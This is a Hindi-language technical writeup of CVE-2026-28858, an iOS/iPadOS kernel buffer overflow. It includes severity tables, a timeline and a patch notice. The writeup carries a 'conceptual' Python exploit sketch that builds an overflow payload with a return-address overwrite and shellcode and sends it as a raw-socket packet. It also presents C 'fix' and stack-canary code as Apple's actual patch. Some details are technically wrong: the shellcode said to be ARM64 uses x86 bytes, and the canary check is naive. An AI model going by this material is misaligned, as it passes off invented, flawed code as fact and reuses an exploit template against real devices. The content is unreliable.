
# CVE-2026-28858 का तकनीकी विश्लेषण Apple iOS/iPadOS कर्नेल में एक गंभीर बफर ओवरफ्लो, जिसमें एक्सप्लॉइट प्रवाह, शमन, और रक्षात्मक कोडिंग उदाहरण शामिल हैं।
╔══════════════════════════════════════════════════════════════╗
║ गंभीरता: क्रिटिकल │ CVSS: 9.8 │ CWE-120 │ रिमोट ║
╚══════════════════════════════════════════════════════════════╝
कोई दूरस्थ उपयोगकर्ता बिना उपयोगकर्ता इंटरैक्शन या विशेषाधिकारों के iOS/iPadOS में सिस्टम की अप्रत्याशित समाप्ति या कर्नेल मेमोरी भ्रष्टाचार उत्पन्न कर सकता है।
| फ़ील्ड | मान |
|---|---|
| CVE ID | CVE-2026-28858 |
| EUVD | EUVD-2026-15131 |
| प्रकाशित | 25 मार्च 2026 |
| अंतिम अपडेट | 26 मार्च 2026 |
| CVSS v3.1 | 9.8 / 10 — क्रिटिकल |
| EPSS | 0.05% |
| वेक्टर | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-120 — आकार सत्यापन के बिना बफर कॉपी |
| स्थिति | विश्लेषित — पैच उपलब्ध |
Apple iOS और iPadOS में बफर ओवरफ्लो, जो कर्नेल इनपुट प्रोसेसिंग में अपर्याप्त सीमा जांच के कारण होता है।
वास्तविक प्रभाव:
CVE-2026-28858 के लिए कोई सार्वजनिक एक्सप्लॉइट मौजूद नहीं है। निम्नलिखित प्रस्तुति अवधारणात्मक है, जो CWE-120 और प्रलेखित हमले वेक्टर पर आधारित है।
# ओवरफ्लो का अवधारणात्मक प्रतिनिधित्व
import socket
# 1. आवंटित बफर भरना (~कर्नेल हैंडलर में विशिष्ट 512 बाइट्स)
buffer_fill = b"A" * 512
# 2. ओवरराइट किया गया रिटर्न पता — हमलावर-नियंत्रित क्षेत्र की ओर इशारा करता है
# वास्तविक iOS/iPadOS में: ASLR + PAC (पॉइंटर ऑथेंटिकेशन कोड) बायपास आवश्यक
return_address = b"\x41\x42\x43\x44"
# 3. शेलकोड: NOP स्लेड + ARM64 के लिए दुर्भावनापूर्ण निर्देश
shellcode = b"\x90" * 16 + b"\xeb\x12..." # NOP स्लेड + पेलोड
payload = buffer_fill + return_address + shellcode
# बिना उपयोगकर्ता इंटरैक्शन के दूरस्थ डिलीवरी
# उदाहरण: हेरफेर किए गए लंबाई फ़ील्ड वाला नेटवर्क पैकेट
import struct
def craft_malicious_packet(target_ip: str, target_port: int):
"""
गलत प्रारूप वाले मेटाडेटा वाला पैकेट बनाता है जिसे iOS कर्नेल
पृष्ठभूमि में प्रोसेस करता है (उपयोगकर्ता UI के बिना)।
उदा: TLS प्रमाणपत्र, छवि मेटाडेटा, नेटवर्क प्रोटोकॉल फ़ील्ड।
"""
# प्रोटोकॉल का वैध हेडर
header = struct.pack(">HH", 0x0001, 0xFFFF) # type=1, length=OVERFLOW
# कर्नेल बफर से अधिक पेलोड
malicious_data = header + payload
with socket.socket(socket.AF_INET, socket.SOCK_RAW) as s:
s.sendto(malicious_data, (target_ip, target_port))
[नेटवर्क/WiFi/BT] → गलत प्रारूप वाला पैकेट
↓
[पृष्ठभूमि में iOS प्रक्रिया] → "लंबाई" फ़ील्ड पढ़ता है = 0xFFFF
↓
[memcpy(कर्नेल_बफर, डेटा, 0xFFFF)] → सीमा जांच के बिना
↓
[ओवरफ्लो: शेलकोड कर्नेल स्टैक/हीप पर लिखा गया]
↓
[प्रोसेसर हमलावर के return_address पर पुनर्निर्देशित]
↓
[ring 0 / कर्नेल विशेषाधिकारों के साथ निष्पादन]
/* ❌ कमजोर कोड (पैच से पहले) */
void procesar_entrada(char *datos_usuario, size_t longitud) {
char bufer_kernel[512];
memcpy(bufer_kernel, datos_usuario, longitud); // बिना जांच
}
/* ✅ सही किया गया कोड (iOS/iPadOS 26.4) */
void procesar_entrada(char *datos_usuario, size_t longitud) {
char bufer_kernel[512];
// सीमा जांच — Apple द्वारा लागू फिक्स
if (longitud > sizeof(bufer_kernel)) {
kernel_log("CVE-2026-28858: input truncado [%zu > 512]", longitud);
return; // कॉपी करने से पहले रोकें
}
memcpy(bufer_kernel, datos_usuario, longitud);
}
/* गहराई में रक्षा तंत्र: स्टैक कैनरी */
#include <string.h>
#define CANARY_VALUE 0xDEADBEEFCAFEBABE
void procesar_entrada_segura(char *datos_usuario, size_t longitud) {
uint64_t canary = CANARY_VALUE;
char bufer_seguro[512];
if (longitud > sizeof(bufer_seguro)) {
log_security_event("Intento de desbordamiento bloqueado");
return;
}
memcpy(bufer_seguro, datos_usuario, longitud);
// कॉपी के बाद कैनरी अखंडता सत्यापित करें
if (canary != CANARY_VALUE) {
panic("Stack smashing detectado — CVE-2026-28858");
}
}
तत्काल कार्रवाई आवश्यक:
iOS 26.4 / iPadOS 26.4 या बाद के संस्करण में अपडेट करें
23 मार्च 2026 → प्रारंभिक प्रकाशन (EUVD)
24 मार्च 2026 → Apple सलाहकार #126792 प्रकाशित
24 मार्च 2026 → पहला उल्लेख पहचाना गया (Feedly)
24 मार्च 2026 → स्वचालित विश्लेषण द्वारा CVSS अनुमान
25 मार्च 2026 → NVD ने CVSS 9.8 — क्रिटिकल निर्धारित किया
25 मार्च 2026 → Qualys में पहचान जोड़ी गई (ID: 610773)
26 मार्च 2026 → स्थिति: विश्लेषित
26.4 से पहले के iOS और iPadOS के सभी संस्करण, जिनमें शामिल हैं:
संदर्भ दस्तावेज़ में प्रभावित CPEs की पूरी सूची देखें।
| स्रोत | URL |
|---|---|
| Apple सुरक्षा सलाहकार | https://support.apple.com/en-us/126792 |
| NVD | https://nvd.nist.gov/vuln/detail/CVE-2026-28858 |
| CWE-120 | https://cwe.mitre.org/data/definitions/120.html |
अस्वीकरण: प्रस्तुत कोड केवल शैक्षिक और रक्षात्मक अनुसंधान उद्देश्यों के लिए एक अवधारणात्मक प्रतिनिधित्व है। CVE-2026-28858 के लिए कोई सार्वजनिक एक्सप्लॉइट मौजूद नहीं है।
| पैरामीटर | मान | विवरण |
|---|
| हमला वेक्टर | नेटवर्क | दूरस्थ रूप से शोषण योग्य |
| जटिलता | कम | कोई विशेष शर्तें नहीं |
| आवश्यक विशेषाधिकार | कोई नहीं | प्रमाणीकरण की आवश्यकता नहीं |
| उपयोगकर्ता इंटरैक्शन | कोई नहीं | ज़ीरो-क्लिक |
| दायरा | अपरिवर्तित | कमजोर घटक तक सीमित |
| गोपनीयता | उच्च | डेटा तक पूर्ण पहुंच |
| अखंडता | उच्च | पूर्ण संशोधन संभव |
| उपलब्धता | उच्च | सिस्टम क्रैश |